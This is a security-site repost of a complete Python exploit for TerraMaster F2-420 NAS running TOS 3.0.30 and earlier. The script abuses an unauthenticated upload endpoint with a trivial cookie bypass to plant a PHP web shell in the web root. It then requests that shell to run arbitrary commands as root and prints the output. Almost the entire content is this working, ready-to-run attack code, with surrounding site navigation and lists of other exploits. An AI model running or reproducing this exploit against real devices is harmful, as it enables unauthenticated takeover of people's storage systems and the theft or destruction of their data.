首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Roo 来源：evilsocket@protonmail.com 作者：Margaritelli 发布时间：2017-05-31   # Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/   #!/usr/bin/python # coding: utf8 # # Exploit: Unauthenticated RCE as root. # Vendor: TerraMaster # Product: TOS <= 3.0.30 (running on every NAS) # Author: Simone 'evilsocket' Margaritelli <evilsocket@protonmail.com> import sys import requests def upload( address, port, filename, path = '/usr/www/' ):     url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path )     try:         files = { 'file': open( filename, 'rb' ) }         cookies = { 'kod_name': '1' } # LOL :D         r = requests.post(url, files=files, cookies=cookies)         if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}':             print "! Unexpected response, exploit might not work:\n%s\n" % r.text         return True     except Exception as e:         print "\n! ERROR: %s" % e     return False def rce( address, port, command ):     with open( '/tmp/p.php', 'w+t' ) as fp:         fp.write( "<?php system('%s'); ?>" % command )     if upload( address, port, '/tmp/p.php' ) == True:         try:             url = "http://%s:%d/p.php" % ( address, port )             return requests.get(url).text         except Exception as e:             print "\n! ERROR: %s" % e     return None if len(sys.argv) < 3:     print "Usage: exploit.py <ip|hostname> <command> (port=8181)\n"     quit() target  = sys.argv[1] command = sys.argv[2] port    = 8181 if len(sys.argv) < 4 else int(sys.argv[3]) out = rce( target, port, command ) if out is not None:     print out.strip()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·KEMP LoadMaster 7.135.0.13245 ·IBM Informix Dynamic Server / ·Microsoft MsMpEng - Remotely E ·ModX CMS Proof Of Concept Shel ·TiEmu 2.08 - Local Buffer Over ·WebKit Document::prepareForDes ·uc-http Daemon - Local File In ·WebKit JSC JSObject::ensureLen ·Octopus Deploy - Authenticated ·WebKit JSC emitPutDerivedConst ·CERIO DT-100G-N/DT-300N/CW-300 ·WebKit CachedFrame Universal C   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved